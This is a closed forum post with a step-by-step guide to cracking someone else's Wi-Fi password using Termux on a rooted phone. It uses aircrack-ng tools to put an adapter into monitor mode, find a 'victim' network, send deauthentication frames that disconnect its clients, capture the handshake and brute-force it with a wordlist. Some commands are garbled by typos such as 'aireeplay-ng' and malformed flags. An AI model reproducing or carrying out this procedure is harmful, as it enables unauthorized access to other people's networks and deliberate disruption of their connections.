🔒 Closed How to use Termux to häçk a Wi-Fi Password?

Status
Not open for further replies.

PHC-FakeNews

Eternal Poster
How to use Termux to häçk a Wi-Fi password?

You can install Tool-X and install scripts such as Aircrack.

In order for this to work you will need an external wifi adapter and a Rooted device.

First connect your wifi-adapter to your device :

1) First open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :

airmon-ng
airmon-ng start wlan0

2) Now start the network detecting by typing this command :

airodump-ng wlan0mon

Here you see your target device and stop the detecting by control + z.

3) Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.

4) Copy victim’s BSSID and also note the target channel CH number and type this command :

airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w

There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon

5) Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :

aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon

now stop attack by control+z and close the terminal.

6) Now paste the password list in your cap folder and also go into the cap folder directory

Now crack with this command :

aircrack-ng -w pass.list 01.cap


7) this is a brute force attack if any password match to the handshake then it will be cracked and you get the password.

Hoping you get it.
 
Status
Not open for further replies.

About this Thread

  • 10
    Replies
  • 2K
    Views
  • 11
    Participants
Last reply from:
fritzjohnbuban

Trending Topics

Online now

Members online
1,026
Guests online
1,044
Total visitors
2,070

Forum statistics

Threads
2,274,739
Posts
28,957,893
Members
1,233,411
Latest member
marti
Back
Top